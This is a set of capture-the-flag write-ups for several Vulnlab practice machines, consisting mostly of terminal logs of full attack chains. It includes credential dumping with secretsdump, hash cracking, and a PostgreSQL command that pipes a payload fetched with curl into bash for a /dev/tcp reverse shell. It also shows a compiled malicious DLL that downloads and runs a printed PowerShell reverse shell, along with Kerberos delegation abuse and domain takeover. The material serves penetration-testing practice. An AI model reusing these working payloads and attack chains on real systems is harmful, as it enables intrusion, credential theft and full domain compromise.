Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save

[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save

now get the machine hashes

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 

get the users hashes

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up... 

evil win-rm to the dc

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}

 

.

That was Fun !

 

 

 

 

 

vulnlab-slonik

vulnlab slonik

a medium linux box

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ mkdir extract2
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ sudo mount -t nfs 10.10.99.219: ./extract2
[sudo] password for puck: 
                                                                                                                     
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ cd extract2                                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ ls -la
total 16
drwxr-xr-x 19 root root 4096 Jul 27 09:22 .
drwxrwxr-x  3 puck puck 4096 Jul 27 09:42 ..
drwxr-xr-x  3 root root 4096 Oct 24  2023 home
drwxr-xr-x 13 root root 4096 Sep 19  2023 var
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ cd home    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ cd service
cd: permission denied: service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo usermod -u 1337 1337                 
usermod: no changes
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo su 1337             
$ bash
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ cd service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ ls -la
total 40
drwxr-x--- 5 1337 1337 4096 Oct 24  2023 .
drwxr-xr-x 3 root root 4096 Oct 24  2023 ..
-rw-rw-r-- 1 1337 1337   90 Oct 24  2023 .bash_history
-rw-r--r-- 1 1337 1337  220 Oct 24  2023 .bash_logout
-rw-r--r-- 1 1337 1337 3771 Oct 24  2023 .bashrc
drwx------ 2 1337 1337 4096 Oct 24  2023 .cache
drwxrwxr-x 3 1337 1337 4096 Oct 24  2023 .local
-rw-r--r-- 1 1337 1337  807 Oct 24  2023 .profile
-rw------- 1 1337 1337  326 Oct 24  2023 .psql_history
drwxrwxr-x 2 1337 1337 4096 Oct 24  2023 .ssh
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)VALUES ('service', 'aa<redacted>c2'WHERE', network access account');
select * from users;
\q
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$

.

crack the hash

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ john hash --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
se<redacted>ce          (?)     
1g 0:00:00:00 DONE 2/3 (2024-07-27 09:48) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..larry
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

ssh connects but immediately disconnects

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh service@10.10.99.219              
The authenticity of host '10.10.99.219 (10.10.99.219)' can't be established.
ED25519 key fingerprint is SHA256:j/hcANass/0veF/m0NAMOR41osL5zUMMMQ9nCYiwjmY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.99.219' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1014-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 27 07:50:05 UTC 2024

  System load:  0.21142578125     Processes:             122
  Usage of /:   32.1% of 7.57GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.99.219
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 24 13:11:33 2023 from 10.10.1.254
Connection to 10.10.99.219 closed.

.

We have to do a trick

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh -N -L /tmp/.s.PGSQL.5433:/var/run/postgresql/.s.PGSQL.5432 service@10.10.99.219         
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 

.

┌──(puck㉿kali)-[~/vulnlab/slonik]
└─$ psql -h /tmp -U postgres -p 5433
psql (15.3 (Debian 15.3-0+deb12u1), server 14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
Type "help" for help.

postgres=# \list
                                             List of databases
   Name    |  Owner   | Encoding | Collate |  Ctype  | ICU Locale | Locale Provider |   Access privileges   
-----------+----------+----------+---------+---------+------------+-----------------+-----------------------
 postgres  | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 service   | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 template0 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
 template1 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
(4 rows)

postgres=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
DROP TABLE
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';

s contains

#!/bin/bash
bash -i >& /dev/tcp/10.8.2.138/443 0>&1

Privesc

postgres@slonik:/opt/backups/current$  python3 -c 'import pty;pty.spawn("/bin/bash")'
<nt$  python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@slonik:/opt/backups/current$ export TERM=xterm
export TERM=xterm
postgres@slonik:/opt/backups/current$ 
zsh: suspended  rlwrap nc -nlvp 443
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
postgres@slonik:/opt/backups/current$

.

postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 pwn
chmod 777 pwn
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s pwn
chmod u+s pwn
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /opt/backups/current/
ls -lah /opt/backups/current/
total 3.0M
drwxr-xr-x 19 root root 4.0K Jul 27 08:26 .
drwxr-xr-x  3 root root 4.0K Oct 23  2023 ..
-rw-------  1 root root    3 Jul 27 08:26 PG_VERSION
..snip..
-rw-------  1 root root   88 Jul 27 08:26 postgresql.auto.conf
-rwxrwxrwx  1 root root 1.4M Jul 27 08:26 pwn

postgres@slonik:/var/lib/postgresql/14/main$ /opt/backups/current/pwn -p
/opt/backups/current/pwn -p
pwn-5.1# id    id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
pwn-5.1# cd /rocd /root
cd /root
pwn-5.1# cat rocat root.txt
cat root.txt
VL{b0<redacted>fa}
pwn-5.1# 

 

vulnlab-phantom

vulnlab-phantom

a medium windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share

.

crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt

.

smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

EML view gives

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant

.

crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat to find pass for verasign file

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

found in backup file /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/ lstanley gB<redacted>Rc

.

crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success

.

crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=cross.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

.

impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=cAdministrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

.

impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::

.

evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.

vulnlab-push

vulnlab-push

a hard windows machine

preperation

create puck.c on kali box

puck.c contains:

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:

            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");


            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '192.168.1.136'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on attacker pc run http listener and nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are succesfull, we continue to the writeup.

Writeup :

To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.

More to come …\

With shell as kelly.hill we find her credentials in her homefolder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check Machine Quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

 

RBCD abuse

From bloodhound we see kelly.hill First Degree Object Control , has AllExtendedRights and WriteAccountRestrictions on MS01, which means that we can read all properties on MS01 and we can edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (Resource based constrained delegation) by having write account restrictions rights

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
